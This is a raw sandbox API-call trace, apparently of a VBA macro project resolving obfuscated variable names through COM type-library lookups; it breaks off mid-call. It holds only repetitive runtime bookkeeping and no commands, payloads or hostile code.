IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.816] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b820fe | out: _Dst=0x67c2d40) returned 0x0 [0069.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ixADUo") returned 0x10b580 [0069.817] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ixADUo" | out: _Dst="_B_var_ixADUo") returned 0x0 [0069.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ixADUo") returned 14 [0069.817] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.817] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ixADUo", lHashVal=0x10b580, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.817] IUnknown:Release (This=0x665ba50) returned 0xd [0069.817] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.817] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ixADUo", lHashVal=0x10b580, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.817] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.817] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.817] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ixADUo", lHashVal=0x10b580, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.817] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.817] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.817] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ixADUo", lHashVal=0x10b580, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.817] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.817] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.817] IUnknown:Release (This=0x665ba50) returned 0xd [0069.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87160e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ixADUo") returned 14 [0069.817] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ixADUo", lHashVal=0x10b580, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x55004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x55004400000000, pDummy=0x0) returned 0x0 [0069.817] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b820fe | out: _Dst=0x144ec0) returned 0x0 [0069.818] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kABkGQ1A", lHashVal=0x103ad1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821f2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kABkGQ1A") returned 9 [0069.818] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kABkGQ1A", lHashVal=0x103ad1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821f2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kABkGQ1A") returned 9 [0069.818] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kABkGQ1A", lHashVal=0x103ad1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.818] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kABkGQ1A") returned 0x103ad1 [0069.818] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="kABkGQ1A" | out: _Dst="kABkGQ1A") returned 0x0 [0069.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="kABkGQ1A") returned 9 [0069.818] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.818] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kABkGQ1A", lHashVal=0x103ad1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.818] IUnknown:Release (This=0x665ba50) returned 0xd [0069.818] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.818] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kABkGQ1A", lHashVal=0x103ad1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.818] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.818] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.818] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kABkGQ1A", lHashVal=0x103ad1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.818] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.818] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.818] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kABkGQ1A", lHashVal=0x103ad1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.818] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821f2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kABkGQ1A") returned 9 [0069.819] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kABkGQ1A", lHashVal=0x103ad1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.819] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.819] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b821f2 | out: _Dst=0x67c2d40) returned 0x0 [0069.819] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kABkGQ1A") returned 0x10125a [0069.819] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_kABkGQ1A" | out: _Dst="_B_var_kABkGQ1A") returned 0x0 [0069.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_kABkGQ1A") returned 16 [0069.819] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.819] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kABkGQ1A", lHashVal=0x10125a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.819] IUnknown:Release (This=0x665ba50) returned 0xd [0069.819] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.819] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kABkGQ1A", lHashVal=0x10125a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.819] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.819] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.819] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kABkGQ1A", lHashVal=0x10125a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.819] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.819] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.819] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kABkGQ1A", lHashVal=0x10125a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.819] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.819] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.819] IUnknown:Release (This=0x665ba50) returned 0xd [0069.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87163e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_kABkGQ1A") returned 16 [0069.819] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kABkGQ1A", lHashVal=0x10125a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x47006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x47006b00000000, pDummy=0x0) returned 0x0 [0069.819] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b821f2 | out: _Dst=0x144ec0) returned 0x0 [0069.819] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Z4GGkXA", lHashVal=0x10c5c4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="Z4GGkXA") returned 8 [0069.820] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Z4GGkXA", lHashVal=0x10c5c4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="Z4GGkXA") returned 8 [0069.820] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Z4GGkXA", lHashVal=0x10c5c4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.820] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Z4GGkXA") returned 0x10c5c4 [0069.820] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="Z4GGkXA" | out: _Dst="Z4GGkXA") returned 0x0 [0069.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="Z4GGkXA") returned 8 [0069.820] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.820] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Z4GGkXA", lHashVal=0x10c5c4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.820] IUnknown:Release (This=0x665ba50) returned 0xd [0069.820] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.820] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Z4GGkXA", lHashVal=0x10c5c4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.820] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.820] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.820] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Z4GGkXA", lHashVal=0x10c5c4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.820] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.820] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.820] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Z4GGkXA", lHashVal=0x10c5c4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.820] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="Z4GGkXA") returned 8 [0069.820] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Z4GGkXA", lHashVal=0x10c5c4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.820] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.820] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b821ca | out: _Dst=0x67c2d40) returned 0x0 [0069.821] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Z4GGkXA") returned 0x10c948 [0069.821] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_Z4GGkXA" | out: _Dst="_B_var_Z4GGkXA") returned 0x0 [0069.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_Z4GGkXA") returned 15 [0069.821] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.821] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Z4GGkXA", lHashVal=0x10c948, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.821] IUnknown:Release (This=0x665ba50) returned 0xd [0069.821] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.821] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Z4GGkXA", lHashVal=0x10c948, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.821] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.821] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.821] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_Z4GGkXA", lHashVal=0x10c948, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.821] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.821] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.821] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Z4GGkXA", lHashVal=0x10c948, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.821] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.821] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.821] IUnknown:Release (This=0x665ba50) returned 0xd [0069.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87166e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_Z4GGkXA") returned 15 [0069.821] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Z4GGkXA", lHashVal=0x10c948, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x6b004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x6b004700000000, pDummy=0x0) returned 0x0 [0069.821] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b821ca | out: _Dst=0x144ec0) returned 0x0 [0069.821] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lGA_4A_", lHashVal=0x10a663, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8221e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lGA_4A_") returned 8 [0069.821] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lGA_4A_", lHashVal=0x10a663, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8221e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lGA_4A_") returned 8 [0069.822] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lGA_4A_", lHashVal=0x10a663, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.822] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lGA_4A_") returned 0x10a663 [0069.822] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="lGA_4A_" | out: _Dst="lGA_4A_") returned 0x0 [0069.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="lGA_4A_") returned 8 [0069.822] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.822] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lGA_4A_", lHashVal=0x10a663, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.822] IUnknown:Release (This=0x665ba50) returned 0xd [0069.822] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.822] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lGA_4A_", lHashVal=0x10a663, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.822] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.822] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.822] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lGA_4A_", lHashVal=0x10a663, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.822] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.822] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.822] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lGA_4A_", lHashVal=0x10a663, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.822] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8221e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lGA_4A_") returned 8 [0069.822] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lGA_4A_", lHashVal=0x10a663, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.822] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.822] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8221e | out: _Dst=0x67c2d40) returned 0x0 [0069.822] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lGA_4A_") returned 0x10a9e7 [0069.822] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="AAZBBQ", cchCount1=-1, lpString2="_B_var_lGA_4A_", cchCount2=-1) returned 3 [0069.822] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_lGA_4A_" | out: _Dst="_B_var_lGA_4A_") returned 0x0 [0069.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_lGA_4A_") returned 15 [0069.822] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.822] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lGA_4A_", lHashVal=0x10a9e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.822] IUnknown:Release (This=0x665ba50) returned 0xd [0069.822] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.823] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lGA_4A_", lHashVal=0x10a9e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.823] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.823] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.823] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lGA_4A_", lHashVal=0x10a9e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.823] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.823] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.823] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lGA_4A_", lHashVal=0x10a9e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.823] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.823] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.823] IUnknown:Release (This=0x665ba50) returned 0xd [0069.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87169e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_lGA_4A_") returned 15 [0069.823] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lGA_4A_", lHashVal=0x10a9e7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x34005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x34005f00000000, pDummy=0x0) returned 0x0 [0069.823] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8221e | out: _Dst=0x144ec0) returned 0x0 [0069.823] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iQAU4BU", lHashVal=0x101900, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82246, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iQAU4BU") returned 8 [0069.823] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iQAU4BU", lHashVal=0x101900, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82246, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iQAU4BU") returned 8 [0069.823] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iQAU4BU", lHashVal=0x101900, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.823] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iQAU4BU") returned 0x101900 [0069.823] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iQAU4BU" | out: _Dst="iQAU4BU") returned 0x0 [0069.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iQAU4BU") returned 8 [0069.823] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.823] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iQAU4BU", lHashVal=0x101900, 